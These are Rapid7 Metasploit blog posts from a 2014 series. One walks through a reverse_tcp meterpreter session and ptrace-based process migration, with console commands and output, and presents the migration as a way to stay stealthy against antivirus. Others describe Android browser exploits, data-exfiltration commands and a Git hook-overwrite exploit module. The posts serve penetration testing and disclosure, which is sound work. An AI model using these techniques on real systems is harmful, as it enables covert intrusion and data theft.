Hello everyone and Happy HaXmas (again) and New Year! On this HaXmas I would like to share with all you a new feature which I'm personally very happy with. It's nothing super new and has limitations, but it's the first meterpreter feature where I've been collaborating I feel really happy of sharing it with all you: support to migrate the Linux meterpreter payload.

Before going ahead, let me clarify something, as you can read on the meterpreter github page:

For some value of "working." Meterpreter in POSIX environments is not considered stable. It does stuff, but expect occasional problems.

Unfortunately it applies to the process migration feature too :\. So be careful when using linux meterpreter and this feature on your pentest! You can experience reliability problems :\ Hopefully these lines also will help to explain limitations and how to use the feature!

Requirement #1: From memory

First of all, linux migrate tries to be "imitate" the windows migrate behavior. It means there is an important requirement, migration should happen from memory, without dropping meterpreter to disk. On windows it's accomplished with the well-known OpenProcess, WriteProcessMemory, CreateRemoteThread, etc. IPC APIs. But these aren't available on Linux, where we decided to use the "ptrace" interface to modify a process memory, registers and control execution. Unfortunately, it introduces the first caveats:

  1. On modern Linux distributions, ptrace restrictions use to apply, so migration isn't always possible.
  2. Once the meterpreter code is injected in the target process, original process execution is replaced. It means the target process won't do its original task anymore, once migration has been accomplished.

That said, how to use it? On older systems, where ptrace limitations are not in use, say for example Ubuntu 10.04 (32 bits), the migration usage is straightforward. It's something like that:

  • Get a meterpreter session on your target:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp

PAYLOAD => linux/x86/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST


msf exploit(handler) > exploit



[*] Started reverse handler on

[*] Starting the payload handler...

[*] Transmitting intermediate stager for over-sized stage...(100 bytes)

[*] Sending stage (1142784 bytes) to

[*] Meterpreter session 1 opened ( -> at 2014-12-31 10:43:02 -0600



meterpreter > getuid

Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000

meterpreter > sysinfo

Computer     : ubuntu

OS           : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 (i686)

Architecture : i686

Meterpreter  : x86/linux

meterpreter >


  • Use the ps command to find a target process. There are some things to remember:
  1. The session user must own the target process.
  2. Use interruptible (or running) processes as targets.
  3. The target process won't do its original task after migration.
  4. Remember which linux meterpreter is only available on 32 bits, so even when running on a 64 bits system, the meterpreter process will be a 32 bits one. And the migration target process must be a 32 bits one too.

meterpreter > ps -U juan

Filtering on user name...



Process List




PID    PPID  Name               Arch  Session  User  Path

---    ----  ----               ----  -------  ----  ----

1894   1     gnome-keyring-d          0        juan  /usr/bin/gnome-keyring-daemon --daemonize --login

1912   1220  gnome-session            0        juan  gnome-session

1946   1912  ssh-agent                0        juan  /usr/bin/ssh-agent /usr/bin/dbus-launch --exit-with-session gnome-session

1949   1     dbus-launch              0        juan  /usr/bin/dbus-launch --exit-with-session gnome-session

1950   1     dbus-daemon              0        juan  /bin/dbus-daemon --fork --print-pid 5 --print-address 7 --session

1953   1     gconfd-2                 0        juan  /usr/lib/libgconf2-4/gconfd-2

1960   1     gnome-settings-          0        juan  /usr/lib/gnome-settings-daemon/gnome-settings-daemon

1962   1     gvfsd                    0        juan  /usr/lib/gvfs/gvfsd

1970   1     gvfs-fuse-daemo          0        juan  /usr/lib/gvfs//gvfs-fuse-daemon /home/juan/.gvfs

1971   1     vmtoolsd                 0        juan  /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr --blockFd 3

1972   1912  polkit-gnome-au          0        juan  /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1

1975   1912  gnome-panel              0        juan  gnome-panel

1978   1912  metacity                 0        juan  metacity --replace

1981   1912  nm-applet                0        juan  nm-applet --sm-disable

1983   1     pulseaudio               0        juan  /usr/bin/pulseaudio --start --log-target=syslog

1984   1912  nautilus                 0        juan  nautilus

1985   1912  gnome-power-man          0        juan  gnome-power-manager

1986   1912  bluetooth-apple          0        juan  bluetooth-applet

1995   1983  gconf-helper             0        juan  /usr/lib/pulseaudio/pulse/gconf-helper

2020   1     gvfs-gdu-volume          0        juan  /usr/lib/gvfs/gvfs-gdu-volume-monitor

2025   1     bonobo-activati          0        juan  /usr/lib/bonobo-activation/bonobo-activation-server --ac-activate --ior-output-fd=19

2028   1     gvfs-gphoto2-vo          0        juan  /usr/lib/gvfs/gvfs-gphoto2-volume-monitor

2031   1     gvfsd-trash              0        juan  /usr/lib/gvfs/gvfsd-trash --spawner :1.6 /org/gtk/gvfs/exec_spaw/0

2032   1     gvfs-afc-volume          0        juan  /usr/lib/gvfs/gvfs-afc-volume-monitor

2045   1     wnck-applet              0        juan  /usr/lib/gnome-panel/wnck-applet --oaf-activate-iid=OAFIID:GNOME_Wncklet_Factory --oaf-ior-fd=18

2046   1     trashapplet              0        juan  /usr/lib/gnome-applets/trashapplet --oaf-activate-iid=OAFIID:GNOME_Panel_TrashApplet_Factory --oaf-ior-fd=24

2054   1     clock-applet             0        juan  /usr/lib/gnome-panel/clock-applet --oaf-activate-iid=OAFIID:GNOME_ClockApplet_Factory --oaf-ior-fd=21

2055   1     notification-ar          0        juan  /usr/lib/gnome-panel/notification-area-applet --oaf-activate-iid=OAFIID:GNOME_NotificationAreaApplet_Factory --oaf-ior-fd=30

2058   1     indicator-apple          0        juan  /usr/lib/indicator-applet/indicator-applet-session --oaf-activate-iid=OAFIID:GNOME_FastUserSwitchApplet_Factory --oaf-ior-fd=36

2059   1     indicator-apple          0        juan  /usr/lib/indicator-applet/indicator-applet --oaf-activate-iid=OAFIID:GNOME_IndicatorApplet_Factory --oaf-ior-fd=42

2075   1     gvfsd-metadata           0        juan  /usr/lib/gvfs/gvfsd-metadata

2076   1     indicator-me-se          0        juan  /usr/lib/indicator-me/indicator-me-service

2078   1     indicator-messa          0        juan  /usr/lib/indicator-messages/indicator-messages-service

2097   1     indicator-sessi          0        juan  /usr/lib/indicator-session/indicator-session-service

2098   1     indicator-appli          0        juan  /usr/lib/indicator-application/indicator-application-service

2099   1     indicator-sound          0        juan  /usr/lib/indicator-sound/indicator-sound-service

2109   1     gvfsd-burn               0        juan  /usr/lib/gvfs/gvfsd-burn --spawner :1.6 /org/gtk/gvfs/exec_spaw/1

2112   1     gnome-terminal           0        juan  gnome-terminal

2114   1     gnome-screensav          0        juan  gnome-screensaver

2115   2112  gnome-pty-helpe          0        juan  gnome-pty-helper

2116   2112  bash                     0        juan  bash

2147   1912  gdu-notificatio          0        juan  /usr/lib/gnome-disk-utility/gdu-notification-daemon

2159   1912  evolution-alarm          0        juan  /usr/lib/evolution/2.28/evolution-alarm-notify

2160   1912  python                   0        juan  python /usr/share/system-config-printer/

2168   1912  update-notifier          0        juan  update-notifier

2310   2112  bash                     0        juan  bash

2745   1     notify-osd               0        juan  /usr/lib/notify-osd/notify-osd

2846   2112  bash                     0        juan  bash

2989   1     gvim                     0        juan  gvim

2991   2112  bash                     0        juan  bash

3378   1     [gedit] <defunct>        0        juan

5965   2846  gdb                      0        juan  gdb /bin/ls

17323  2991  [dummy] <defunct>        0        juan

18063  2310  msf.elf                  0        juan  ./msf.elf

18084  1     gcalctool                0        juan  gcalctool

23799  1     [gedit] <defunct>        0        juan


On the case above the "gcalctool" process looks like a good candidate for this DEMO. Of course, wouldn't be the best candidate on a real intrusion, since probably the calculator won't have a long live . The easy way to use the feature is jut to provide the target PID:

meterpreter > migrate 18084

[*] Migrating to 18084

[*] Migration completed successfully.

meterpreter > getpid

Current pid: 18084

meterpreter > getuid

Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000

meterpreter >


Requirement #2: Reuse the original socket

As a second requirement, in order to imitate the windows behavior the meterpreter session socket will be reused. On Windows a socket can be duplicate on a remote process with WSADuplicateSocket. But such API doesn't exist on Linux as far as I know, you cannot dup() a socket on a process which isn't a child. Luckily UNIX domain sockets can be used with one caveat, they will use filesystem (which breaks the first requirement).


The most important reason for "in-memory" migration is to remain stealthy, avoiding security products such as antivirus monitoring filesystem. Hopefully, antivirus won't catch an UNIX Domain socket used just to share a socket as malicious, what makes us think it is not so bad! By default the UNIX domain socket will be written to "/tmp", but you can specify an alternate directory with an optional second argument which the command accepts:


meterpreter > migrate -h

Usage: migrate <pid> [writable_path]



Migrates the server instance to another process.

NOTE: Any open channels or other dynamic state will be lost.


meterpreter > migrate 2075 /home/juan/.pulse

[*] Migrating to 2075

[*] Migration completed successfully.

meterpreter > getpid

Current pid: 2075


And that's all for this HaXmas and introduction to linux meterpreter migration! As always, remember which the meterpreter code is also open source if you're interested on the details! And there is a lot of work to do with the Linux meterpreter, improving its reliability and features. It's a really interesting code to work with, with lot of awaiting joys . So, if you interested in collaborate with Metasploit it is definitely a good option to look at!


Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

This post is the tenth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014.

The Metasploit Framework uses operating system and service fingerprints for automatic target selection and asset identification. This blog post describes a major overhaul of the fingerprinting backend within Metasploit and how you can extend it by submitting new fingerprints.


Historically, Metasploit wasn't great at fingerprinting. Shortly after the Rapid7 acquisition, we added an internal fingerprinting system to the framework, but we still depended on imports from Nexpose, Nmap, and other external tools to obtain comprehensive results. The only areas where fingerprint coverage was passable were the SMB, HTTP, and web browser rules, since many modules depended on these for automatic configuration. Metasploit has the ability to import data from dozens of external sources, including web application scanners, vulnerability scanners, and even raw PCAP files. Normalizing all of this data was a challenge and the fingerprinting backend had the job of squashing conflicting OS and service names into something that modules could easily understand.


By mid-2013, Metasploit's fingerprints were getting stale and the ruleset was becoming more tangled than ever. Changing one fingerprint required carefully reviewing all of the code paths where a conflicting rule might override the resulting value. New operating systems and services were released and the backend simply wasn't keeping up. For our Metasploit Pro customers, this was less of an issue due to the direct integration with Nexpose and Nmap, but we needed a fresh approach all the same.


Earlier in 2013, my team was looking at whether we could improve our products using existing internet-wide scan data. Our first project involved an overhaul of the Nexpose SNMP fingerprints by leveraging the Critical.IO dataset. Nexpose fingerprints are stored as a series of regular expressions within XML files. These fingerprints were easy to read, write, and test. Over the course of a week we were able to expand Nexpose's SNMP system description fingerprints to cover approximately 85% of the devices found on the internet by the Critical.IO SNMP scan. This was a quick win and made it clear that we should be looking at internet scan data as a primary source of new fingerprints.


In 2014, we took the same approach using the Project Sonar data to add fingerprints for popular HTTP services. Our approach was to sort the raw scan data by frequency, determine which fingerprints would cover the largest number of systems, and then sit down and write those fingerprints. This work improved fingerprint accuracy for our Nexpose customers and provided an opportunity to do targeted vulnerability research on the most widely exposed devices and services. The issues with the Metasploit fingerprints remained, but a plan was starting to come together.


First, we had to get sign-off to open source the Nexpose fingerprint database. Next, we had write some wrapper code that made interfacing with and testing these fingerprints quick and painless. Finally, we had to rip out the existing Metasploit fingerprinting engine, normalize the entire framework to use the new fingerprints, and add some glue code to map Nexpose conventions to what Metasploit expected. This required a major effort across the Nexpose, Metasploit, and Labs teams and took the better part of five months to finally deliver.


The result was Recog, an open source recognition framework. Recog is now the upstream for both Nexpose and Metasploit fingerprints. We will continue to leverage Project Sonar to add and improve fingerprints, but even better, our customers and open source users can now submit new fingerprints of their own. Recog is available under a BSD 2-Clause license and can be used within your own projects, open source or otherwise, and although the test framework is written in Ruby, the XML fingerprints are easy to process in just about every language.


Metasploit users benefit through consistent formatting of third-party data imports, better fingerprinting when using scanner modules, and support for targeting newer operating systems and web browsers. Nexpose users will continue to see improvements to fingerprinting, with several major leaps in coverage as Project Sonar progresses. Metasploit contributors can take advantage of the new fingerprint.match note type to provide fingerprint suggestions to the new matching engine. If you are interested in the mechanics of how Metasploit interfaces with Recog, take a look at the OS normalization code in MDM.


Recog is a great example of Rapid7's commitment to open source and our desire to collaborate with the greater information security community. Although writing fingerprints isn't the most exciting task, accurate fingerprints are a requirement for reliable vulnerability assessments and successful penetration tests. If you are looking for a chance to contribute to Metasploit, or simply want better fingerprinting for systems within your own network, please considering submitting updates to Recog. Feel free to drop by the #metasploit channel on the Freenode IRC network if you would like to chat with the development team. If you have a new fingerprint but don't feel comfortable sending a pull request, feel free to file an Issue within Recog repository on Github instead.



This post is the ninth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014.

It has been a busy year for Android exploitation here at Metasploit. As the makers of the greatest pentesting toolkit on the planet, vulnerabilities that affect over 1 billion active devices greatly interest us, not to mention the amazing independent researchers out in the world, such as Rafay Baloch and long-time contributors Joshua Drake and Tim Wright.  Earlier this year I began researching exploitation vectors into Android that could affect the average user, not expecting to find much. I was in for a surprise… 202px-Android_robot.png

The webview_addjavascriptinterface exploit (link)


In early February, I was testing a module that Joshua @jduck Drake wrote for exploiting a known vulnerability in the WebView implementation on devices before 4.2 (this represented about 70% of active devices at the time). The issue affected apps that called addJavascriptInterface to inject a Java object into the Javascipt environment. This feature was commonly used by apps with ad components to render their HTML ads. By abusing Java’s reflection APIs the Javascript code in the ad could run shell commands. jduck’s module implemented an HTTP proxy server that would man-in-the-middle (MITM) the Android device and inject malicious Javascript code into HTTP ads, in order to drop and execute a reverse shell. This worked well but required the attacker to have established a MITM stance on the target.


As I tested jduck’s module, I ran into some problems (with the sample app I had built, it turns out). Attempting to debug things a bit I opened the malicious Javascript code in the stock Android browser: to my surprise, I got a shell! I reached out to jduck who verified that indeed many stock browsers were vulnerable - 70% of all devices had a built-in browser that was trivially exploitable. This turned out to be a separate, unreported vulnerability in the AOSP Browser app. I was not the first person to notice this either - later I found references to the bug on


With my discovery in hand I tweaked jduck’s module a bit to turn it into a browser exploit, added it to Browser Autopwn, and pushed it up for review. The initial module had its share of problems - it was not compatible with 4.0 devices, and it merely gained a shell in the context of the user - many Android permissions were lost along the way (like camera). With a lot of help from community contributor timwr, we were able to get a working Android meterpreter session from the exploit that retained the permission level of the browser.

The adobe_reader_pdf_js_interface exploit (link)


Some months later, it was reported that the Adobe Reader app for Android exposed injected Java objects to Javascript code running in a PDF. After a bit of frustration, I moved the actual exploit logic into a mixin and was able to get a File format exploit module working that generated a PDF that spawn a Meterpreter session.

addJavascriptInterface lives on


In many ways, this exploit continues to be effective. For example, apps with ad views that were built before API level 17 are still vulnerable to jduck’s original MITM vector. A discussion of the issue can be seen here. Eventually Android 4.4.4 was patched to prevent the Object.getClass call from being used, closing the hole for good on new devices.

Android Meterpreter Improvements


In late May, community contributor Anwar Mohammed added many improved commands to assist in exfiltrating data from targeted devices. These commands included dump_sms, dump_calllog, and geolocate. Of course, for these commands to work, the Meterpreter process must have the necessary privileges, which depends on the exploited application. For example, some Browser apps would run with webcam permissions, meaning the webcam_snap command was available.

The Browser UXSS Dilemma (link)


In September I was reading through some public exploit code when something caught my eye - a trivial UXSS vulnerability in the Android stock browser on versions 4.3 and earlier. Security researcher Rafay Baloch had tried to report the vulnerability to Google with no success. UXSS vulnerabilities happen now and then in pretty much every browser, and allow content served by an attacker to access resources they are not supposed to - like cookies and CSRF tokens for another domain (say, What was unique about this vuln was that I was sure I had seen it before. And I had - from a 2010 bug in Chromium (reported upstream to WebKit). It's a little mysterious as to how a 2010 bug affected an OS that shipped in mid–2013. Android’s copy of WebKit was simply not kept up to date with upstream WebKit, and a bunch of security patches were missed. I had read this before (here is a 2011 presentation where ~20 WebKit bugs were found in Android 2.3, just by running through up-to-date WebKit’s layout tests), but had no idea the issue was still this exposed.


Since the exploit PoC was already public, I wrapped it into a module with a few sample attacks (UXSS exploitation is incredibly flexible) and we shipped it. After the dust settled, Google responded and backported the patch to the Android 4.3 branch, although downstream adoption from the vendors still lags the upstream 4.3 branch considerably.

The UXSS Dilemma Continues (link)


Of course, noticing a 3-year-old, previously disclosed vulnerability in Android 4.3’s WebKit implementation was just the tip of the iceberg. Rafay continued to test WebKit bugs and successfully found five different UXSS vulnerabilities still present in 4.3! And those are just the ones that were found. A complete privacy breakdown. This kind of thing makes me sad, because not so long ago I was stuck on Android 4.3…

Samsung Knox Galaxy RCE (link)


In November Quarkslab disclosed an issue affecting Samsung devices with the Knox security component. An arbitrary web page could force the user to install an arbtirary APK as an “update” to Knox. To exploit this, I worked with vulnerability discoverer Andre Molou to write a browser exploit that launched the update process, waited for the apk to be installed, then used an intent URL to launch the apk. The result was a one-click RCE exploit, where the user is essentially bullied into clicking “Install” (see the video).

"Open in new tab" Cookie Database Disclosure (link)


If you need another reason not to use the 4.3 browser, Rafay discovered that it was possible to open a file URL from an HTTP page by getting the user to choose “Open in new tab”. By combining this with another vulnerability to open the sqlite cookie database as an HTML document in the browser, the entire cookie database (including HTTPOnly cookies) can be stolen, which means an attacker can steal all of your sessions at once. Rafay has a good writeup of this vulnerability on his blog. Luckily Android had already patched this issue in February 2014, but adoption from the downstream vendors that still ship 4.3 devices is slow to none.

towelroot local exploit (link)


Last but not least, afore-mentioned contributor timwr has done some excellent work porting CVE–2014–3153, a privilege escalation bug in the Linux kernel reported by researcher geohot into a local exploit. This would allow Meterpreter sessions on 4.4 to be upgraded to root (“system” uid 0), although the Android permission context is lost. This module is still awaiting review, so keep an eye out for it in upcoming releases.

The Way Forward


To escape the WebKit nightmare, users are strongly advised update to 4.4 (Kitkat) or higher as soon as possible. If that’s not possible for you, it’s time to get a new device. Seriously. Even if you were to replace the AOSP browser with the Chrome app (recommended), many, many apps will likely still be vulnerable to attacks on any WebView components embedded in those apps (including addJavascriptInterface RCE for apps compiled before API level 17). On 4.4+, the WebKit implementation of WebView is replaced with (the much more up-to-date) Chromium, and all these problems disappear.


Even better, as of 5.0 (Lollipop), the Chromium system library is updated separately from the OS, allowing regular Play store updates to provide out-of-band patches for the native browser and WebView components. Such a bright future. In 2015, we expect to continue and extend our coverage of mobile and embedded devices, so keep an eye on that Pull Request queue for the up and coming exploits that are no doubt waiting to be discovered!

This post is the eighth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014.


A week or two back, Mercurial inventor Matt Mackall found what ended up being filed as CVE-2014-9390.  While the folks behind CVE are still publishing the final details, Git clients (before versions, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial clients (before version 3.2.3) contained three vulnerabilities that allowed malicious Git or Mercurial repositories to execute arbitrary code on vulnerable clients under certain circumstances.


To understand these vulnerabilities and their impact, you must first understand a few basic things about Git and Mercurial clients.  Under the hood, a Git or Mercurial repository on disk is really just a directory.  In this directory is another specially named directory (.git for Git, .hg for Mercurial) that contains all of the configuration files and metadata that makes up the repository.  Everything else outside of this special directory is just a pile of files and directories, often called the working directory, written to disk based on the previous mentioned metadata.  So, in a way, if you had a Git repository called Test, Test/.hg is the repository and everything else under the Test directory is simply a working copy of of the files contained in the repository at a particular point in time.  An nearly identical concept also exists in Mercurial.


Here is a quick example of a simple Git repository that contains has no files committed to it.  As you can see, even this empty repository has a fair amount of metadata and a number of configuration files:


$  git init foo
$   tree -a foo
└── .git
    ├── branches
    ├── config
    ├── description
    ├── HEAD
    ├── hooks
    │   ├── applypatch-msg.sample
    │   ├── commit-msg.sample
    │   ├── post-update.sample
    │   ├── pre-applypatch.sample
    │   ├── pre-commit.sample
    │   ├── prepare-commit-msg.sample
    │   ├── pre-rebase.sample
    │   └── update.sample
    ├── info
    │   └── exclude
    ├── objects
    │   ├── info
    │   └── pack
    └── refs
        ├── heads
        └── tags


If you then add a single file to it called test.txt, you can see how the directory starts to change as the raw objects are added to the .git/objects directory:


$ cd foo
$ date > test.txt && git add test.txt  && git commit -m "Add test.txt" -a
[master (root-commit) fb19d8e] Add test.txt
1 file changed, 1 insertion(+)
create mode 100644 test.txt
$  git log
commit fb19d8e1e5db83b4b11bbd7ed91e1120980a38e0
Author: Jon Hart Date:   Wed Dec 31 09:08:41 2014 -0800

    Add test.txt

$ tree -a .
├── .git
│  ├── branches
│  ├── config
│  ├── description
│  ├── HEAD
│  ├── hooks
│  │  ├── applypatch-msg.sample
│  │  ├── commit-msg.sample
│  │  ├── post-update.sample
│  │  ├── pre-applypatch.sample
│  │  ├── pre-commit.sample
│  │  ├── prepare-commit-msg.sample
│  │  ├── pre-rebase.sample
│  │  └── update.sample
│  ├── index
│  ├── info
│  │  └── exclude
│  ├── logs
│  │  ├── HEAD
│  │  └── refs
│  │      └── heads
│  │          └── master
│  ├── objects
│  │  ├── 1c
│  │  │  └── 8fe13acf2178ea5130480625eef83a59497cb0
│  │  ├── 4b
│  │  │  └── 825dc642cb6eb9a060e54bf8d69288fbee4904
│  │  ├── e5
│  │  │  └── 58a44cf7fca31e7ae5f15e370e9a35bd1620f7
│  │  ├── fb
│  │  │  └── 19d8e1e5db83b4b11bbd7ed91e1120980a38e0
│  │  ├── info
│  │  └── pack
│  └── refs
│      ├── heads
│      │  └── master
│      └── tags
└── test.txt


Similarly, for Mercurial:

$  hg init blah
$  tree -a blah
└── .hg
    ├── 00changelog.i
    ├── requires
    └── store

2 directories, 2 files
$  cd blah
$  date > test.txt && hg add test.txt && hg commit -m "Add test.txt"
$  hg log
changeset:   0:ea7dac4a11f0
tag:         tip
user:        Jon Hart date:        Wed Dec 31 09:25:07 2014 -0800
summary:     Add test.txt

$  tree -a .
├── .hg
│   ├── 00changelog.i
│   ├── cache
│   │   └── branch2-served
│   ├── dirstate
│   ├── last-message.txt
│   ├── requires
│   ├── store
│   │   ├── 00changelog.i
│   │   ├── 00manifest.i
│   │   ├── data
│   │   │   └── test.txt.i
│   │   ├── fncache
│   │   ├── phaseroots
│   │   ├── undo
│   │   └── undo.phaseroots
│   ├── undo.bookmarks
│   ├── undo.branch
│   ├── undo.desc
│   └── undo.dirstate
└── test.txt


These directories (.git, .hg) are created by a client when the repository is initially created or cloned.  The contents of these directories can be modified by users to, for example, configure repository options (.git/config for Git, .hg/hgrc for Mercurial), and are routinely modified by Git and Mercurial clients as part of normal operations on the repository. Simplified, the .hg and .git directories contain everything necessary for the repository to operate, and everything outside of these directories is considered is considered part of the working directory, namely the contents of the repository itself (test.txt in my simplified examples).


Want to learn more? Git Basics and Understanding Mercurial are great resources.


During routine repository operations such as cloning, updating, committing, etc, the repository working directory is updated to reflect the current state of the repository.  Using the examples from above, upon cloning either of these repositories, the local clone of the repository would be updated to reflect the current state of test.txt.


This is where the trouble begins.  Both Git and Mercurial clients have had code for a long time that ensures that no commits are made to anything in the .git or .hg directories.  Because these directories control client side behavior of a Git or Mercurial repository, if they were not protected, a Git or Mercurial server could potentially manipulate the contents of certain sensitive files in the repository that could cause unexpected behavior when a client performs certain operations on the repository.


Unfortunately these sensitive directories were not properly protected in all cases.  Specifically:


  1. On operating systems which have case-insensitive file systems, like Windows and OS X, Git clients (before versions, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) can be convinced to retrieve and overwrite sensitive configuration files in the .git directory which can allow arbitrary code execution if a vulnerable client can be convinced to perform certain actions (for example, a checkout) against a malicious Git repository.  While a commit to a file under .git (all lower case) would be blocked, a commit to .giT (partially lower case) would not be blocked and would result in .git being modified because .git is equivalent to .giT on a case-insensitive file system.
  2. These same Git clients as well as Mercurial versions before 3.2.3 have a nearly identical vulnerability that affects HFS+ file systems (OS X and Windows) where certain Unicode codepoints are ignored in file names.
  3. Mercurial before 3.2.3 on Windows has a nearly identical vulnerability on Windows only where MS-DOS file "short names" or 8.3 formats are possible.


Basic exploitation of the first vulnerability is fairly simple to do with basic Git commands as I described in #4435, and the commits that fix the second and third vulnerabilities show simple examples of how to exploit it.


But basic exploitation is boring so in #4440 I've spiced things up a bit.  As currently written, this module exploits the first of these three vulnerabilities by launching an HTTP server designed to simulate a Git repository accessed over HTTP, which is one of the most common ways to interact with Git.  Upon cloning this repository, vulnerable clients will be convinced to overwrite Git hooks, which are shell scripts that get executed when certain operations happen (committing, updating, checkout, etc).  By default, this module overwrites the .git/hooks/post-checkout script which is executed upon completion of a checkout, which conveniently happens at clone time so the simple act of cloning a repository can allow arbitrary code execution on the Git client.  It goes a little bit further and provides some simplistic HTML in the hopes of luring in potentially vulnerable clients:



And, if you clone it, it only looks mildly suspicious:


$ git clone
Cloning into 'ldf'...
$ cd ldf
$ git log
commit 858597e39d8a5d8e3511d404bcb210948dc835ae
Author: Deborah Phillips Date:   Thu Apr 29 17:44:02 2004 -0500

    Initial commit to open git repository for!

The module has the beginnings of support for the second and third vulnerabilities, so this particular #haxmas gift may need some work by you, the Metasploit community.



Filter Blog

By date: By tag: